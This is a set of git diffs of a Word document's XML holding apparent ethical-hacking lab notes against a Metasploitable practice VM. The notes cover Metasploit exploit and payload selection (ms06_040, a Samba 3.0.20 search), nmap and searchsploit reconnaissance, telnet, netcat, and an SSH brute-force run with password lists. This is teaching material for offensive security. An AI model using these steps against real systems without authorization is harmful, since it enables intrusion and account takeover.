+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> go to modules as a sample</w:t>
             </w:r>
           </w:p>
         </w:tc>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -2541,92 +2541,325 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>msfconsole</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> – </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">to trigger </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> in shell</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:sym w:font="Wingdings" w:char="F0E0"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Command that commonly use</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>help</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Show payloads</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Show exploits -&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t>Use exploit/</w:t>
+            </w:r>
+            <w:r>
+              <w:t>windows/smb/ms06_040.netapi</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>NOTE: module name and the path name -&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Show info</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> or </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>show options</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>NOTE: If IP address is different</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t>set LHOST 192.168.1.75</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">set </w:t>
+            </w:r>
+            <w:r>
+              <w:t>RHOSTS</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.1.75</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: show targets </w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:r>
+              <w:t>paypload</w:t>
+            </w:r>
+            <w:r>
+              <w:t>s</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set target {number}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: exploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:vMerge/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+            <w:vMerge/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Attacking our exploitation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit {version}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>--s</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ear</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ch {</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>version</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
           <w:p/>
         </w:tc>
         <w:tc>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -388,7 +388,11 @@
           <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Virtual Machine msfadmin</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -2837,7 +2841,10 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>--s</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t>s</w:t>
             </w:r>
             <w:r>
               <w:t>ear</w:t>
@@ -2858,15 +2865,56 @@
               <w:t>}</w:t>
             </w:r>
           </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: use exploit/unix/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>C</w:t>
+            </w:r>
+            <w:r>
+              <w:t>L: show payploads</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> or show options</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set target {number}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: exploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Netcat – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: nc -help</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -2915,20 +2915,319 @@
               <w:t>CL: nc -help</w:t>
             </w:r>
           </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Telnet</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: Searchsploit Linux tetnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: search Linux telnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: telnet {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>SMB</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchs samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FIND THE VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:r>
+              <w:t>info</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> or show options</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t>set RHOSTS {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>GET VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>REPEAT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: searchsploit </w:t>
+            </w:r>
+            <w:r>
+              <w:t>Samba 3.0.20</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t>user {PATHNAME}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>BRUTEFORCE</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> attack</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: search SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t>use auxiliary/scanner/ssh/ssh_login</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show info</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>PASS_FILE</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>USER_FILE</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>SET RHOST</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve"> CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>CL: s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>essions</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sessions</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FROM DESKTOP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -9,8 +9,8 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4675"/>
-        <w:gridCol w:w="4675"/>
+        <w:gridCol w:w="4945"/>
+        <w:gridCol w:w="4631"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -1004,6 +1004,26 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>-b all</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>OR</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1156,7 +1176,6 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:tab/>
             </w:r>
             <w:r>
@@ -1949,7 +1968,6 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Decoy</w:t>
             </w:r>
             <w:r>
@@ -2715,24 +2733,18 @@
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">set </w:t>
-            </w:r>
-            <w:r>
-              <w:t>RHOSTS</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
+              <w:t>set RHOSTS 192.168.1.75</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">CL: show targets </w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">CL: show </w:t>
             </w:r>
             <w:r>
@@ -2853,29 +2865,878 @@
               <w:t>ch {</w:t>
             </w:r>
             <w:r>
+              <w:t xml:space="preserve"> version </w:t>
+            </w:r>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use exploit/unix/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show payploads or show options</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set target {number}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: exploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Netcat – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: nc -help</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Telnet</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: Searchsploit Linux tetnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: search Linux telnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: telnet {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>SMB</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchs samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FIND THE VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>info</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or show options</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or show payloads</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set RHOSTS {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>GET VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>REPEAT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit Samba 3.0.20</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: user {PATHNAME}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: show payloads</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: set payload {PAYLOAD-NAME} </w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>BRUTEFORCE</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
-              <w:t>version</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use exploit/unix/-&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>C</w:t>
-            </w:r>
-            <w:r>
-              <w:t>L: show payploads</w:t>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> attack</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: search SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show info</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: set </w:t>
+            </w:r>
+            <w:r>
+              <w:t>PASS_FILE</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> {filepath}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t>USER_FILE</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:t>SET RHOST</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
